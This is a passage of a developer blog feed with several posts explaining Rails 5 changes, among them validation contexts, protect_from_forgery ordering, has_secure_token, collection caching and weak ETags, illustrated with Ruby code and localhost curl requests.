<content type="html"><![CDATA[<p>Active Record<a href="http://guides.rubyonrails.org/active_record_validations.html">validation</a> is a well-known and widely used functionality of Rails. Slightly less popular is Rails's ability to validate with a custom context.</p><p>If used properly, contextual validations can result in much cleaner code. To understand validation context, we will take the example of a form which is submitted in multiple steps:</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  validate :personal_info  validate :education, on: :create  validate :work_experience, on: :update  validate :final_step, on: :submission  def personal_info    # validation logic goes here..  end  # Similarly, all the validation methods go here.end</code></pre><p>Let's go through all four validations one by one.</p><p><em>1. personal_info</em> validation has no context defined (notice the absence of <code>on:</code>). Validations with no context are executed every time a model save is triggered. Please go through all the triggers<a href="http://guides.rubyonrails.org/active_record_validations.html">here</a>.</p><p><em>2. education</em> validation has the context of <code>:create</code>. It is executed <em>only</em> when a new object is created.</p><p><em>3. work_experience</em> validation is in the <code>:update</code> context and gets triggered for updates <em>only</em>. <code>:create</code> and <code>:update</code> are the only two pre-defined contexts.</p><p><em>4. final_step</em> is validated using a custom context named <code>:submission</code>. Unlike the above scenarios, it needs to be explicitly triggered like this:</p><pre><code class="language-ruby">form = MultiStepForm.new# Eitherform.valid?(:submission)# Orform.save(context: :submission)</code></pre><p><code>valid?</code> runs the validation in the given context and populates <code>errors</code>. 
<code>save</code> would first call <code>valid?</code> in the given context and persist the changes if validations pass; otherwise it populates <code>errors</code>.</p><p>One thing to note here is that when we validate using an explicit context, Rails bypasses all other <em>contexts</em> including <code>:create</code> and <code>:update</code>.</p><p>Now that we understand validation context, we can switch our focus to the <em>validate multiple contexts together</em><a href="https://github.com/rails/rails/pull/21535">enhancement</a> in Rails 5.</p><p>Let's change our contexts from the above example to</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  validate :personal_info, on: :personal_submission  validate :education, on: :education_submission  validate :work_experience, on: :work_ex_submission  validate :final_step, on: :final_submission  def personal_info    # code goes here..  end  # Similarly, all the validation methods go here.end</code></pre><p>For each step, we would want to validate the model with all previous steps and avoid all future steps. Prior to Rails 5, this could be achieved like this:</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  #...  def save_personal_info    self.save if self.valid?(:personal_submission)  end  def save_education    self.save if self.valid?(:personal_submission)              &amp;&amp; self.valid?(:education_submission)  end  def save_work_experience    self.save if self.valid?(:personal_submission)              &amp;&amp; self.valid?(:education_submission)              &amp;&amp; self.valid?(:work_ex_submission)  end  # And so on...end</code></pre><p>Notice that <code>valid?</code> takes only one context at a time. So we have to repeatedly call <code>valid?</code> for each context.</p><p>This gets simplified in Rails 5 by enhancing <code>valid?</code> and <code>invalid?</code> to accept an array. 
Our code changes to:</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  #...  def save_personal_info    self.save if self.valid?(:personal_submission)  end  def save_education    self.save if self.valid?([:personal_submission,                              :education_submission])  end  def save_work_experience    self.save if self.valid?([:personal_submission,                              :education_submission,                              :work_ex_submission])  endend</code></pre><p>A tad bit cleaner I would say.</p>]]></content>
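The "array of contexts" behavior described in this entry can be sketched with a small plain-Ruby toy model. This is an illustration of the idea, not Rails internals; `TinyModel` and its API are invented for this sketch:

```ruby
# Toy model of contextual validation (illustrative only, not Rails internals):
# validations are registered per context, and valid? accepts one context or,
# as in Rails 5, an array of contexts.
class TinyModel
  attr_reader :errors

  def initialize
    @errors = []
    @validations = Hash.new { |hash, key| hash[key] = [] }
  end

  def validate(context, &block)
    @validations[context] << block
  end

  def valid?(contexts)
    @errors = []
    Array(contexts).each do |context|
      @validations[context].each { |validation| validation.call(@errors) }
    end
    @errors.empty?
  end
end

form = TinyModel.new
form.validate(:personal_submission)  { |errors| errors << "name missing" }
form.validate(:education_submission) { |errors| errors << "school missing" }

form.valid?(:personal_submission)                           # runs one context
form.valid?([:personal_submission, :education_submission])  # runs both at once
```

`Array(contexts)` is what lets a single symbol and an array be handled by the same code path, which is essentially the ergonomic win the Rails 5 change delivers.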
    </entry><entry>
       <title><![CDATA[Rails 5 changes protect_from_forgery execution order]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-default-protect-from-forgery-prepend-false"/>
      <updated>2016-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-default-protect-from-forgery-prepend-false</id>
       <content type="html"><![CDATA[<p>What makes Rails a great framework to work with is its sane <a href="http://rubyonrails.org/doctrine/#convention-over-configuration">conventions over configuration</a>. The Rails community is always striving to keep these conventions relevant over time. In this blog, we will see what changed in the execution order of <code>protect_from_forgery</code>, and why.</p><p><code>protect_from_forgery</code> protects applications against <a href="csrf-and-rails">CSRF</a>. Follow that link to read more about <code>CSRF</code>.</p><h2>What</h2><p>If we generate a brand new Rails application in Rails 4.x, then <code>application_controller</code> will look like this.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  protect_from_forgery with: :exception
end</code></pre><p>Looking at the code, it does not seem like <code>protect_from_forgery</code> is a <code>before_action</code> call, but in reality that's what it is. Since <code>protect_from_forgery</code> is a <code>before_action</code> call, it should follow the order in which other <code>before_action</code> callbacks are executed. But this one is special in the sense that <code>protect_from_forgery</code> is executed first in the series of <code>before_action</code> callbacks, no matter where <code>protect_from_forgery</code> is mentioned. Let's see an example.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  before_action :load_user

  protect_from_forgery with: :exception
end</code></pre><p>In the above case, even though the <code>protect_from_forgery</code> call is made after <code>load_user</code>, the protection executes first. And we can't do anything about it: there is no option to stop Rails from doing this.</p><p>Rails 5 <a href="https://github.com/rails/rails/commit/39794037817703575c35a75f1961b01b83791191">changes</a> this behavior by introducing a <code>boolean</code> option called <code>prepend</code>. The default value of this option is <code>false</code>, which means <code>protect_from_forgery</code> now gets executed in the order in which it is called. Of course, this can be overridden by passing <code>prepend: true</code> as shown below, and then the protection runs first, just like in Rails 4.x.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  before_action :load_user

  protect_from_forgery with: :exception, prepend: true
end</code></pre><h2>Why</h2><p>There isn't any real advantage in forcing <code>protect_from_forgery</code> to be the first filter in the chain of filters. On the flip side, there are cases where the output of another <code>before_action</code> should decide whether <code>protect_from_forgery</code> executes. Let's see an example.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  before_action :authenticate

  protect_from_forgery unless: -&gt; { @authenticated_by.oauth? }

  private

    def authenticate
      if oauth_request?
        # authenticate with oauth
        @authenticated_by = 'oauth'.inquiry
      else
        # authenticate with cookies
        @authenticated_by = 'cookie'.inquiry
      end
    end
end</code></pre><p>The above code would fail in Rails 4.x: <code>protect_from_forgery</code>, though called after <code>:authenticate</code>, actually gets executed before it, so we would not have <code>@authenticated_by</code> set properly.</p><p>In Rails 5, <code>protect_from_forgery</code> gets executed after <code>:authenticate</code> and gets skipped if authentication happened via OAuth.</p><h2>Upgrading to Rails 5</h2><p>Let's take an example to understand how this change might affect the upgrade of applications from Rails 4 to Rails 5.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  before_action :set_access_time

  protect_from_forgery

  private

    def set_access_time
      current_user.access_time = Time.now
      current_user.save
    end
end</code></pre><p>In Rails 4.x, <code>set_access_time</code> is <strong>not</strong> executed for <em>bad requests</em>. But it gets executed in Rails 5, because <code>protect_from_forgery</code> is called after <code>set_access_time</code>.</p><p>Saving data (<code>current_user.save</code>) in a <code>before_action</code> is already a big enough violation of best practices, but now such writes would also leave us vulnerable to CSRF whenever they run before <code>protect_from_forgery</code>.</p>]]></content>
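The ordering change can be pictured with a toy callback chain. This is illustrative plain Ruby, not ActionController internals; `CallbackChain` is invented here, though `verify_authenticity_token` is the real filter name that `protect_from_forgery` installs:

```ruby
# Toy callback chain (illustrative, not ActionController internals) showing
# what prepend: true changes: where a filter lands in the execution order.
class CallbackChain
  attr_reader :order

  def initialize
    @order = []
  end

  def before_action(name, prepend: false)
    prepend ? @order.unshift(name) : @order.push(name)
  end
end

# Rails 5 default (prepend: false): filters run in the order they are declared.
rails5 = CallbackChain.new
rails5.before_action(:load_user)
rails5.before_action(:verify_authenticity_token)

# Rails 4.x behavior (prepend: true): forgery protection jumps to the front.
rails4 = CallbackChain.new
rails4.before_action(:load_user)
rails4.before_action(:verify_authenticity_token, prepend: true)
```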
    </entry><entry>
       <title><![CDATA[Rails 5 provides config to use UUID as primary key]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-provides-application-config-to-use-UUID-as-primary-key"/>
      <updated>2016-04-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-provides-application-config-to-use-UUID-as-primary-key</id>
      <content type="html"><![CDATA[<p>UUIDs are a popular alternative to auto-incrementing integer primary keys.</p><pre><code class="language-ruby">create_table :users, id: :uuid do |t|
  t.string :name
end</code></pre><p>Notice that <code>id: :uuid</code> is passed to <code>create_table</code>. This is all we need to do to have UUID as the primary key for <code>users</code>.</p><p>Now, if an application is designed to use UUIDs instead of integers, then chances are that new tables too will use UUID as the primary key. And it can easily get repetitive to add <code>id: :uuid</code> to <code>create_table</code> every time a new model is generated.</p><p>Rails 5 comes with <a href="https://github.com/rails/rails/pull/22033">a solution</a>. We need to set the primary key type to UUID in <code>config/application.rb</code>.</p><pre><code class="language-ruby">config.generators do |g|
  g.orm :active_record, primary_key_type: :uuid
end</code></pre><p>This automatically adds <code>id: :uuid</code> to <code>create_table</code> in all future migrations.</p><p>If we are using a recent version of PostgreSQL, then we should enable the <code>pgcrypto</code> extension as per the <a href="https://guides.rubyonrails.org/active_record_postgresql.html#uuid">Rails guide</a>.</p><p>To enable the <a href="https://www.postgresql.org/docs/8.3/pgcrypto.html">pgcrypto</a> extension, we need a migration which does something like this.</p><pre><code class="language-ruby">class EnablePgcryptoExtension &lt; ActiveRecord::Migration
  def change
    enable_extension 'pgcrypto'
  end
end</code></pre>]]></content>
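For a feel of the values involved: pgcrypto's `gen_random_uuid()` produces random version 4 UUIDs, and Ruby's standard library generates the same format, which is handy for tests and fixtures:

```ruby
require "securerandom"

# SecureRandom.uuid returns a random (version 4) UUID, the same format that
# PostgreSQL's gen_random_uuid() generates for UUID primary keys.
id = SecureRandom.uuid
# 36 characters in 8-4-4-4-12 hex groups; the version nibble is always 4.
```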
    </entry><entry>
       <title><![CDATA[Rails 5 changed Active Job default adapter to Async]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-changed-default-active-job-adapter-to-async"/>
      <updated>2016-03-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-changed-default-active-job-adapter-to-async</id>
       <content type="html"><![CDATA[<p>Active Job has built-in adapters for multiple queuing backends, among which two are intended for development and testing. They are the <a href="http://api.rubyonrails.org/classes/ActiveJob/QueueAdapters/InlineAdapter.html">Active Job Inline adapter</a> and the <a href="http://api.rubyonrails.org/classes/ActiveJob/QueueAdapters/AsyncAdapter.html">Active Job Async adapter</a>.</p><p>These adapters can be configured as follows.</p><pre><code class="language-ruby"># for Active Job Inline
Rails.application.config.active_job.queue_adapter = :inline

# for Active Job Async
Rails.application.config.active_job.queue_adapter = :async</code></pre><p>In Rails 4.x the default queue adapter is <code>:inline</code>. In Rails 5 it has <a href="https://github.com/rails/rails/commit/625baa69d14881ac49ba2e5c7d9cac4b222d7022">been changed to</a> <code>:async</code> by DHH.</p><h2>Asynchronous execution</h2><p>With <code>inline</code>, as the name suggests, the job executes in the same process that invokes it. With the Async adapter, the job is executed asynchronously using an in-process thread pool.</p><p>The Async adapter uses a <a href="https://github.com/ruby-concurrency/concurrent-ruby">concurrent-ruby</a> thread pool, and the queued jobs are retained in memory. Since the data is stored in memory, it is lost if the application restarts. Hence, the Async adapter should not be used in production.</p><h2>Running in the future</h2><p>The Async adapter supports running a job at some time in the future through <code>perform_later</code>. <code>Inline</code> executes the job immediately and does not support running the job in the future.</p><p>Neither the Async adapter nor the Inline adapter supports configuring priorities among queues, execution timeouts, or retry intervals/counts.</p><h2>Advantage of having Async as the default adapter</h2><p>In Rails 4.x, where <code>Inline</code> is the default adapter, test cases could mistakenly depend on a job's behavior happening synchronously in the development/test environment. Using the <code>Async</code> adapter by default helps users write tests that do not rely on such synchronous behavior.</p><p>It's a step closer to simulating a production environment, where jobs are executed asynchronously against more persistent backends.</p><p>Consider an example where an e-commerce site sends an email for every order placed.</p><pre><code class="language-ruby">test &quot;order is created successfully&quot; do
  # Code to test that a record in the orders table is created
end

test &quot;order email is sent&quot; do
  # Code to test that the order email is sent
end</code></pre><p>The process of sending the email can be part of a job which is invoked from an <code>after_create</code> callback in the <code>Order</code> model.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base
  after_create :send_order_email

  def send_order_email
    # Invoke the job of sending an email asynchronously.
  end
end</code></pre><p>When the <code>Inline</code> adapter is used, wrongly configured email settings will cause both of the above tests to fail. This is because sending the email happens within the process of order creation, and any unhandled error while sending the email would kill that process.</p>]]></content>
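The "in-process thread pool, data retained in memory" point can be sketched with a minimal plain-Ruby job queue. This is a toy stand-in for the Async adapter, not the concurrent-ruby pool it actually uses:

```ruby
# Toy in-process async queue: jobs live in memory and run on a worker thread,
# which is why pending jobs are lost when the process restarts.
class TinyAsyncQueue
  def initialize
    @jobs = Queue.new
    @worker = Thread.new do
      while (job = @jobs.pop)   # a nil sentinel stops the loop
        job.call
      end
    end
  end

  def perform_later(&job)
    @jobs << job                # enqueue without blocking the caller
  end

  def shutdown
    @jobs << nil
    @worker.join
  end
end

results = Queue.new
queue = TinyAsyncQueue.new
queue.perform_later { results << :order_email_sent }
queue.shutdown                  # wait for the worker to drain the queue
```

The caller returns from `perform_later` immediately; the work happens on the worker thread, which is the behavior tests can no longer accidentally rely on being synchronous.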
    </entry><entry>
       <title><![CDATA[Support for left outer join in Rails 5]]></title>
       <author><name>Ratnadeep Deshmane</name></author>
      <link href="https://www.bigbinary.com/blog/support-for-left-outer-joins-in-rails-5"/>
      <updated>2016-03-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/support-for-left-outer-joins-in-rails-5</id>
       <content type="html"><![CDATA[<p>Suppose in a blog application there are authors and posts. A post belongs to an author, while an author has many posts.</p><p>The app needs to show a list of all the authors along with the number of posts each of them has written.</p><p>For this, we need to join the authors and posts tables with a &quot;left outer join&quot;. More about &quot;left outer join&quot; <a href="http://blog.codinghorror.com/a-visual-explanation-of-sql-joins">here</a>, <a href="http://www.dofactory.com/sql/left-outer-join">here</a> and <a href="http://stackoverflow.com/questions/406294/left-join-and-left-outer-join-in-sql-server">here</a>.</p><p>In Rails 4.x, we need to write the SQL for a left outer join manually, as Active Record does not have support for outer joins.</p><pre><code class="language-ruby">authors = Author.joins('LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;author_id&quot; = &quot;authors&quot;.&quot;id&quot;')
                .uniq
                .select(&quot;authors.*, COUNT(posts.*) as posts_count&quot;)
                .group(&quot;authors.id&quot;)</code></pre><p>Rails 5 has <a href="https://github.com/rails/rails/pull/12071">added a left_outer_joins</a> method.</p><pre><code class="language-ruby">authors = Author.left_outer_joins(:posts)
                .uniq
                .select(&quot;authors.*, COUNT(posts.*) as posts_count&quot;)
                .group(&quot;authors.id&quot;)</code></pre><p>It also allows performing the left join on multiple tables at the same time.</p><pre><code class="language-ruby">&gt;&gt; Author.left_joins :posts, :comments
  Author Load (0.1ms)  SELECT &quot;authors&quot;.* FROM &quot;authors&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;author_id&quot; = &quot;authors&quot;.&quot;id&quot; LEFT OUTER JOIN &quot;comments&quot; ON &quot;comments&quot;.&quot;author_id&quot; = &quot;authors&quot;.&quot;id&quot;</code></pre><p>If you feel <code>left_outer_joins</code> is too long to type, then Rails 5 also has an alias method, <code>left_joins</code>.</p>]]></content>
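What the left outer join buys here can be seen with plain Ruby data: every author appears in the result even with zero posts, which an inner join would drop. The data below is invented for illustration, not Active Record:

```ruby
# What LEFT OUTER JOIN gives us, sketched with plain Ruby data (illustrative):
# every author appears in the result, even one with zero posts, whereas an
# inner join would drop the post-less author entirely.
authors = [{ id: 1, name: "Ann" }, { id: 2, name: "Bob" }]
posts   = [{ id: 10, author_id: 1 }, { id: 11, author_id: 1 }]

posts_count = authors.map do |author|
  [author[:name], posts.count { |post| post[:author_id] == author[:id] }]
end.to_h
# => {"Ann"=>2, "Bob"=>0}
```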
    </entry><entry>
       <title><![CDATA[has_secure_token for unique random token in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/has-secure-token-to-generate-unique-random-token-in-rails-5"/>
      <updated>2016-03-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/has-secure-token-to-generate-unique-random-token-in-rails-5</id>
       <content type="html"><![CDATA[<p>We sometimes need unique, random tokens in our web apps. Here is how we typically build them.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  before_create :set_access_token

  private

  def set_access_token
    self.access_token = generate_token
  end

  def generate_token
    loop do
      token = SecureRandom.hex(10)
      break token unless User.where(access_token: token).exists?
    end
  end
end</code></pre><h2>has_secure_token in Rails 5</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/18217">has added a has_secure_token method</a> to generate a random alphanumeric token for a given column.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  has_secure_token
end</code></pre><p>By default, Rails assumes that the attribute name is <code>token</code>. If the attribute has a different name, we can pass it as a parameter to <code>has_secure_token</code>.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  has_secure_token :password_reset_token
end</code></pre><p>The above code assumes that we already have a <code>password_reset_token</code> attribute in our model.</p><pre><code class="language-ruby">&gt;&gt; user = User.new
&gt;&gt; user.save
=&gt; true
&gt;&gt; user.password_reset_token
=&gt; 'qjCbex522DfVEVd5ysUWppWQ'</code></pre><p>The generated tokens are URL-safe, fixed-length strings.</p><h2>Migration helper for generating tokens</h2><p>We can also <a href="https://github.com/rails/rails/pull/18448">generate</a> a migration for a token column, similar to other data types.</p><pre><code class="language-plaintext">$ rails g migration add_auth_token_to_user auth_token:token</code></pre><pre><code class="language-ruby">class AddAuthTokenToUser &lt; ActiveRecord::Migration[5.0]
  def change
    add_column :users, :auth_token, :string
    add_index :users, :auth_token, unique: true
  end
end</code></pre><p>Notice that the migration automatically adds a unique index on the generated column.</p><p>We can also generate a model with a token attribute.</p><pre><code class="language-plaintext">$ rails g model Product access_token:token</code></pre><pre><code class="language-ruby">class CreateProducts &lt; ActiveRecord::Migration[5.0]
  def change
    create_table :products do |t|
      t.string :access_token

      t.timestamps
    end
    add_index :products, :access_token, unique: true
  end
end</code></pre><p>The model generator also adds the <code>has_secure_token</code> method to the model.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecord
  has_secure_token :access_token
end</code></pre><h2>Regenerating tokens</h2><p>Sometimes we need to regenerate tokens based on some expiration criteria.</p><p>To do that, we can simply call <code>regenerate_#{token_attribute_name}</code>, which regenerates the token and saves it to its respective attribute.</p><pre><code class="language-ruby">&gt;&gt; user = User.first
=&gt; &lt;User id: 11, name: 'John', email: 'john@example.com',
        token: &quot;jRMcN645BQyDr67yHR3qjsJF&quot;,
        password_reset_token: &quot;qjCbex522DfVEVd5ysUWppWQ&quot;&gt;
&gt;&gt; user.password_reset_token
=&gt; &quot;qjCbex522DfVEVd5ysUWppWQ&quot;
&gt;&gt; user.regenerate_password_reset_token
=&gt; true
&gt;&gt; user.password_reset_token
=&gt; &quot;tYYVjnCEd1LAXvmLCyyQFzbm&quot;</code></pre><h2>Beware of race conditions</h2><p>It is possible to hit a race condition in the database while generating tokens. So it is advisable to add a unique index in the database to deal with this unlikely scenario.</p>]]></content>
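The pre-Rails-5 "generate until unique" pattern from the top of this entry can be tried standalone, with an in-memory `Set` standing in for the database lookup (`EXISTING_TOKENS` and `generate_unique_token` are invented for this sketch):

```ruby
require "securerandom"
require "set"

# The "generate until unique" pattern, runnable standalone: an in-memory Set
# (EXISTING_TOKENS, invented here) stands in for the database existence check.
EXISTING_TOKENS = Set.new

def generate_unique_token
  loop do
    token = SecureRandom.hex(10)   # 10 random bytes => 20 hex characters
    break token unless EXISTING_TOKENS.include?(token)
  end
end

token = generate_unique_token
EXISTING_TOKENS << token
```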
    </entry><entry>
       <title><![CDATA[Suppress save events in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/suppress-save-events-in-rails-5"/>
      <updated>2016-03-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/suppress-save-events-in-rails-5</id>
       <content type="html"><![CDATA[<p>Rails 5 added the <a href="https://github.com/rails/rails/pull/18910">suppress</a> method, which prevents the receiver from being saved during the given block.</p><h2>Use case for the suppress method</h2><p>Let's say we have an e-commerce application which has many products. Whenever a new product is launched, subscribed customers are notified about it.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecord
  has_many :notifications
  belongs_to :seller

  after_save :send_notification

  def launch!
    update_attributes!(launched: true)
  end

  private

  def send_notification
    notifications.create(message: 'New product Launched', seller: seller)
  end
end

class Notification &lt; ApplicationRecord
  belongs_to :product
  belongs_to :seller

  after_create :send_notifications

  private

  def send_notifications
    # Sends notification about product to customers.
  end
end

class Seller &lt; ApplicationRecord
  has_many :products
end</code></pre><p>This creates a notification record every time we launch a product.</p><pre><code class="language-ruby">&gt;&gt; Notification.count
=&gt; 0
&gt;&gt; seller = Seller.last
=&gt; &lt;Seller id: 6, name: &quot;John&quot;&gt;
&gt;&gt; product = seller.products.create(name: 'baseball hat')
=&gt; &lt;Product id: 4, name: &quot;baseball hat&quot;, seller_id: 6&gt;
&gt;&gt; product.launch!
&gt;&gt; Notification.count
=&gt; 1</code></pre><p>Now, we have a situation where we need to launch a product but we don't want to send notifications about it.</p><p>Before Rails 5, this was possible only by adding more conditions.</p><h2>ActiveRecord::Base.suppress in Rails 5</h2><p>In Rails 5, we can use the <code>ActiveRecord::Base.suppress</code> method to suppress the creation of notifications, as shown below.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecord
  def launch_without_notifications
    Notification.suppress do
      launch!
    end
  end
end

&gt;&gt; Notification.count
=&gt; 0
&gt;&gt; product = Product.create!(name: 'tennis hat')
=&gt; &lt;Product id: 1, name: &quot;tennis hat&quot;&gt;
&gt;&gt; product.launch_without_notifications
&gt;&gt; Notification.count
=&gt; 0</code></pre><p>As we can see, no new notifications were created when the product was launched inside the <code>Notification.suppress</code> block.</p><p>Check out <a href="https://github.com/rails/rails/pull/18910">the pull request</a> to gain a better understanding of how <code>suppress</code> works.</p>]]></content>
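The shape of `suppress` can be sketched in plain Ruby: a flag that is set for the duration of a block and consulted before saving. This is a toy model (`TinyNotification` is invented here); Rails' real implementation tracks suppressed classes per thread rather than using a simple class flag:

```ruby
# Toy sketch of a suppress-style block (illustrative; Rails' real suppress
# tracks suppressed classes per thread, not via a simple class-level flag).
class TinyNotification
  @suppressed = false
  @saved = []

  class << self
    attr_reader :saved

    def suppress
      @suppressed = true
      yield
    ensure
      @suppressed = false   # always restored, even if the block raises
    end

    def create(message)
      @saved << message unless @suppressed
    end
  end
end

TinyNotification.create("launched")            # saved normally
TinyNotification.suppress do
  TinyNotification.create("launched quietly")  # dropped inside the block
end
TinyNotification.create("launched again")      # saving works again afterwards
```

The `ensure` clause is the important detail: suppression ends when the block exits, no matter how.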
    </entry><entry>
       <title><![CDATA[Rails 5 improves rendering partial from cache]]></title>
       <author><name>Ratnadeep Deshmane</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-makes-partial-redering-from-cache-substantially-faster"/>
      <updated>2016-03-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-makes-partial-redering-from-cache-substantially-faster</id>
      <content type="html"><![CDATA[<p>Let's have a look at Rails view code that renders a partial using a collection.</p><pre><code class="language-erb"># index.html.erb
&lt;%= render partial: 'todo', collection: @todos %&gt;

# _todo.html.erb
&lt;% cache todo do %&gt;
  &lt;%= todo.name %&gt;
&lt;% end %&gt;</code></pre><p>In the above case, Rails will do one fetch from the cache for each todo.</p><p>A fetch is usually pretty fast with any caching solution; however, one fetch per todo can make the app slow.</p><p>The <a href="https://github.com/n8/multi_fetch_fragments">multi_fetch_fragments</a> gem fixed this issue by using the <a href="http://api.rubyonrails.org/classes/ActiveSupport/Cache/Store.html#method-i-read_multi">read_multi</a> API provided by Rails.</p><p>In a single call to the cache, this gem fetches all the cache fragments for a collection. The author of the gem saw a <a href="http://ninjasandrobots.com/rails-faster-partial-rendering-and-caching">78% speed improvement</a> by using it.</p><p>The features of this gem <a href="https://github.com/rails/rails/pull/18948">have been folded into Rails 5</a>.</p><p>To get the benefits of collection caching, just add <code>cached: true</code> as shown below.</p><pre><code class="language-erb"># index.html.erb
&lt;%= render partial: 'todo', collection: @todos, cached: true %&gt;

# _todo.html.erb
&lt;% cache todo do %&gt;
  &lt;%= todo.name %&gt;
&lt;% end %&gt;</code></pre><p>With <code>cached: true</code> present, Rails will issue one <code>read_multi</code> call to the cache store instead of reading from it once per partial.</p><p>Rails will also log cache hits, as below.</p><pre><code class="language-plaintext">  Rendered collection of todos/_todo.html.erb [100 / 100 cache hits] (339.5ms)</code></pre><p>Check out <a href="https://github.com/rails/rails/pull/23695">the pull request</a> to gain a better understanding of how collection caching works.</p>]]></content>
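The round-trip saving that `read_multi` provides can be sketched with a tiny in-memory cache. `TinyCache` is invented here and only counts round trips; a real cache store's win is network latency, not Ruby method calls:

```ruby
# Tiny in-memory cache (invented for this sketch) that counts round trips,
# to show why one read_multi beats one read per collection item.
class TinyCache
  attr_reader :reads

  def initialize
    @data = {}
    @reads = 0
  end

  def write(key, value)
    @data[key] = value
  end

  def read(key)
    @reads += 1          # every read is a round trip to the cache store
    @data[key]
  end

  def read_multi(*keys)
    @reads += 1          # one round trip, many fragments
    keys.each_with_object({}) { |key, hash| hash[key] = @data[key] if @data.key?(key) }
  end
end

cache = TinyCache.new
todos = %w[todo/1 todo/2 todo/3]
todos.each { |key| cache.write(key, "<li>#{key}</li>") }

todos.each { |key| cache.read(key) }   # without cached: true -- 3 round trips
fragments = cache.read_multi(*todos)   # with cached: true    -- 1 round trip
```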
    </entry><entry>
       <title><![CDATA[Rails 5 switches from strong etags to weak etags]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-switches-from-strong-etags-to-weak-tags"/>
      <updated>2016-03-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-switches-from-strong-etags-to-weak-tags</id>
       <content type="html"><![CDATA[<p><a href="https://en.wikipedia.org/wiki/HTTP_ETag">ETag</a>, short for entity tag, is part of the HTTP header and is used for web cache validation. An ETag is a digest of the resource that uniquely identifies a specific version of the resource. This helps browsers and web servers determine whether the resource in the browser's cache is exactly the same as the resource on the server.</p><h3>Strong v/s weak ETags</h3><p>ETags support <a href="https://tools.ietf.org/html/rfc2616#section-13.3.3">strong and weak validation</a> of the resource.</p><p>A strong ETag indicates that the two representations are identical in both response body and response headers.</p><p>A weak ETag indicates that the two representations are semantically equivalent. It compares only the response body.</p><p>Weak ETags are <a href="https://github.com/rails/rails/blob/a61bf5f5b63780a3e0b4c2d4339967df82b370de/actionpack/lib/action_dispatch/http/cache.rb#L91-L94">prefixed with</a> <code>W/</code>, so one can easily distinguish weak ETags from strong ETags.</p><pre><code class="language-plaintext">&quot;543b39c23d8d34c232b457297d38ad99&quot;     Strong ETag
W/&quot;543b39c23d8d34c232b457297d38ad99&quot;   Weak ETag</code></pre><p>W3 has <a href="https://www.w3.org/Protocols/HTTP/1.1/rfc2616bis/issues/#i71">an example</a> page to illustrate how ETag matching works.</p><p>When a server receives a request, it returns an ETag header as part of the HTTP response. This ETag represents the state of the resource. On subsequent HTTP requests, the client sends this ETag via the <code>If-None-Match</code> header so the server can identify whether the resource has changed. The server compares the current ETag with the one sent by the client. If they match, the server responds with <code>304 Not Modified</code>, which means the resource content in the client's cache is up to date. If the resource has changed, the server sends the updated resource along with the new ETag.</p><p>Let's see it in action.</p><h2>ETags in Rails 4.x</h2><p>Rails 4.x generates strong ETags by default, i.e. without the <code>W/</code> prefix.</p><pre><code class="language-ruby">class ItemsController &lt; ApplicationController
  def show
    @item = Item.find(params[:id])
    fresh_when @item
  end
end</code></pre><p>We start by making a first request to the server.</p><pre><code class="language-plaintext">$ curl -i http://localhost:3000/items/1
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Etag: &quot;618bbc92e2d35ea1945008b42799b0e7&quot;
Last-Modified: Sat, 30 Jan 2016 08:02:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 98359119-14ae-4e4e-8174-708abbc3fd4b
X-Runtime: 0.412232
Server: WEBrick/1.3.1 (Ruby/2.2.2/2015-04-13)
Date: Fri, 04 Mar 2016 10:50:38 GMT
Content-Length: 1014
Connection: Keep-Alive</code></pre><p>For the next request, we send the ETag that was returned by the server. Notice that the server responds with <code>304 Not Modified</code>.</p><pre><code class="language-plaintext">$ curl -i -H 'If-None-Match: &quot;618bbc92e2d35ea1945008b42799b0e7&quot;' http://localhost:3000/items/1
HTTP/1.1 304 Not Modified
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Etag: &quot;618bbc92e2d35ea1945008b42799b0e7&quot;
Last-Modified: Sat, 30 Jan 2016 08:02:12 GMT
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: e4447f82-b96c-4482-a5ff-4f5003910c18
X-Runtime: 0.012878
